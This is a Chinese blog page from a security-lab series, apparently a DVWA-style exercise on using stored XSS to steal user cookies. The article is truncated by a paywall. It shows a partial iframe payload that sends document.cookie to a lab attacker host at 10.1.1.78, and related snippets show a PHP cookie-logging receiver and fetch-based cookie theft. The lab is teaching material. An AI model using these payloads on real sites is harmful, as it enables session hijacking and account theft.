2021-09-01 网安实验-XSS-存储型XSS获取用户cookie

最新推荐文章于 2025-06-13 23:35:49 发布
最新推荐文章于 2025-06-13 23:35:49 发布
阅读量4.3w 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 愚公系列-网络安全实验 文章标签: php html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/aa2528877987/article/details/120053479
本文介绍了存储型XSS攻击的一种常见手法,即通过JavaScript构造请求,将用户Cookie作为参数传递到攻击者可控的页面,然后在该页面中捕获并保存这些Cookie。讲解了创建接收Cookie的PHP页面recv_cookies.php的实现过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一:存储型XSS

1.保存用户cookie
我们可以通过JS,构造一个请求,来请求一个我们有权限的页面,在构造请求的时候,把用户的cookie当作参数传过去,然后我们就可以在这个页面里,接收传过来的参数,然后再保存起来。所以首先需要写一个接收cookie的页面,它能够接收某个参数,然后保存起来。页面写好保存在c:\wamp\www\xss\的目录下,recv_cookies.php这个文件就是用来接收cookie并保存的,源码如下:
在这里插入图片描述

2.构造语句

<script>document.write("<iframe width=0 height=0 src='http://10.1.1.78/recv_cookies.php?cookie="+document.coo
了解本专栏 订阅专栏 解锁全文 超级会员免费看
XSS漏洞利用——获取cookie
cxrpty的博客
02-20 1932
实验环境:DVWA 实验步骤: 一、在服务器创建一个1.php文件获取cookie值,cookie值写入1.txt中 php代码如下: <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...
实战:存储XSS攻击获取Cookie及防御
热门推荐
qq_43535990的博客
11-06 1万+
实战:存储XSS攻击获取Cookie及防御一、存储XSS攻击原理二、搭建测试站1.phpstudy开启Apache和mysql服务2.搭建数据库3.创建站文件4.书写代码三、创建xss攻击文件四、上传payload获得用户Cookie 一、存储XSS攻击原理 在讲解存储XSS攻击之前,我们要先明白XSS是个什么东西。 XSS(Cross Site Scripting)跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意
渗透实战:利用XSS获取cookie和密码
最新发布
ericalezl的博客
06-13 763
之后点击轮询可以看到目标向的域名发送的请求,找到一个请求中带有 secret 和 session 字样的就是 cookie 信息。将复制的域名放到 fetch 中,body 为 document.cookie,就是访问这个留言板的用户cookie。访问 my-account 转包,将 cookie 替换重放即可登录管理员账户。留言板位置找到注入 xss 的位置后,构造获取对方密码的请求。输入的任何单引号双引号尖括号都会被 unicode 编码。直接换另一种代码执行方式。里面可以执行 js 代码。
web全中存储XSS手动获取cookie信息
qq_63539335的博客
01-14 713
web全中存储XSS漏洞,基础手工攻击演示
存储xss攻击实验-获取cookie
hainabaichuan__的博客
11-12 304
5.模拟用户访问xss-stored,即可中招,在kali就可查到cookie.txt。3.apache的运行账号授权,稍后将客户端的cookie写到本地来。按下f12,搜索textarea,将最大限制字数50改为200。4-5成功,192.168.204.136就是kali黑客服务器。4-3提交提前准备好的代码进行提交跳转到kali黑客服务器。1.启动kali linux的apache服务。2.在kali上制作XSS脚本。4-1先清理之前的程序。4-2修改前端字数限制。
存储xss实现获取cookie(本地实战)
2301_80661529的博客
02-28 778
实战结束留言:如果你拥有自己的站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP。在此祝你们学习顺利!
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
存储XSS与反射XSS和DOMXSS不同,它不是通过URL参数或者DOM动态生成的,而是将恶意代码存储在了服务器上,比如用户评论、论坛帖子等地方。当其他用户访问这些含有恶意代码的页面时,浏览器会执行其中的脚本,...
xss-labs-master.rar
05-09
2. 存储XSS:恶意脚本被永久存储在服务器上,所有访问该页面的用户都会受到影响。 3. DOMXSS:恶意代码通过修改页的DOM(Document Object Model)结构来执行。 二、XSS攻击手段 XSS攻击可以实现多种目标,如...
-xss详解资源文档
12-12
根据不同的注入方式和执行时机,XSS攻击可以分为反射XSS攻击、存储XSS攻击和DOMXSS攻击三种。 反射XSS攻击通常需要用户主动访问带有攻击代码的链接,攻击者可能会利用邮件、短信等方式诱导用户点击恶意链接...
xss-labs.zip
06-25
1. 存储XSS:攻击者将恶意脚本存入服务器,当其他用户访问含有恶意脚本的页面时,脚本会在用户的浏览器中执行。在实验室环境中,我们需要找出能够将脚本注入数据库触发执行的途径。 2. 反射XSS:这种类的...
第五章 城会玩?抱歉我是一名程序员 存储xss偷取更高权限的管理员登陆cookie
Q893448322的博客
12-27 562
** 目录 第一章 黑客学习路线梳理 第二章 让你的kali变得更好用 第三章 别惹程序员0.0~简单的web渗透拿到用户名密码 第四章 抛弃我,我会战斗不息~跳过防火墙,进入后台 ** 继上一篇文章(第四章 抛弃我,我会战斗不息~跳过防火墙,进入后台),我们已经进入了美人所创建的站后台,把她页要展示的信息好好“调整”了一下,但是还是意犹未尽,毕竟现在的小小惩罚还没有让她意识到问题的严重性嘛,所以雁过留声,想着还要在她的站植入一个木马,借此好好调戏一番抛弃自己的美人~ 但是发现我们进一步的攻击却受到了
DVWA系列之21 存储XSS分析与利用
weixin_33857679的博客
12-30 209
存储跨站可以将XSS语句直接写入到数据库中,因而相比反射跨站的利用价值要更大。在DVWA中选择XSS stored,这里提供了一个类留言本的页面。我们首先查看low级别的代码,这里提供了$message和$name两个变量,分别用于接收用户在Message和Name框中所提交的数据。对这两个变量都通过mysql_real_escape_string()函数进行了过滤,但是这只能阻止SQL注入...
XSS的键盘记录cookie获取
Williamanddog的博客
01-26 2746
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
存储XSS结合XSS平台获取cookie信息进后台——efucms
W小哥
12-29 5966
实验目的:利用存储XSS获取管理员Cookie信息,修改本地Cookie信息为管理员Cookie,以管理员身份不输入用户名、密码直接登陆后台 受害者浏览器:谷歌浏览器(也就是站管理员使用的浏览器) 攻击者浏览器:火狐渗透便捷版浏览器 一、攻击者利用XSS漏洞攻击过程 第一步:使用火狐渗透测试便捷版浏览器打开目标站 第二步:找到可以发表评论的地方,输入进行XSS测试,看是否弹窗,若弹窗则说明...
全】P 4-2 XSS盗取cookie
Z_David_Z的博客
02-17 565
目录0X01 cookie介绍0X02 反射XSS盗取cookie0X03 利用cookie会话劫持0X04 劫持会话后的操作 0X01 cookie介绍 Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。 目前有些 Cookie 是临时的,有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间,一旦超过规定的时间,该 Cookie 就会被系统清除 服务器可
DVWA之存储XSS
qq_39682037的博客
03-19 2425
存储XSS Security Level: low 源码 <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sa...
DVWA之XSS跨站脚本攻击(存储
ximo的博客
01-27 571
DVWA之XSS跨站脚本攻击(存储) 目录DVWA之XSS跨站脚本攻击(存储)原理框图低等级1.弹窗2.重定向3.获取cookie中等级1.弹窗2.重定向3.获取cookie高等级 原理框图 弹窗 重定向 获取cookie 低等级 1.弹窗 插入xss代码: 返回xss页面: 其他人访问该页面,触发xss: 2.重定向 插入恶意代码: 返回xss页面,触发重定向: 其他人访问该页面,触发xss: 3.获取cookie 插入xss代码: 使用 kali linux 进行监听: 其他人访问该
--- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 5645
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
储存xxs漏洞实验演示和讲解
北冥有鱼
04-13 983
1.存储xss漏洞 我们来到pikachu平台,打开存储xss可以看到,这里是个留言板,还有几个上次做sql实验留下来的留言,也就是说,我们提交的留言被后台给存储起来了 我们先试着来提交一些特殊符号,可以在页的源代码中看到我们提交的东西 之后我们还是使用这个payload <script>alert('xss')</script> 之后xss的字符会被弹出来,...
掌握XSS攻击必备神器:XSS-Encode谷歌插件
XSS攻击可以分为三种类:反射XSS存储XSS和DOMXSS。根据不同的类,攻击者利用的场景和手段也有所不同。 #### XSS攻击的危害 XSS攻击的危害不容小觑,它可以被用来: - 盗取用户Cookie,进而冒充用户操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愚公搬代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值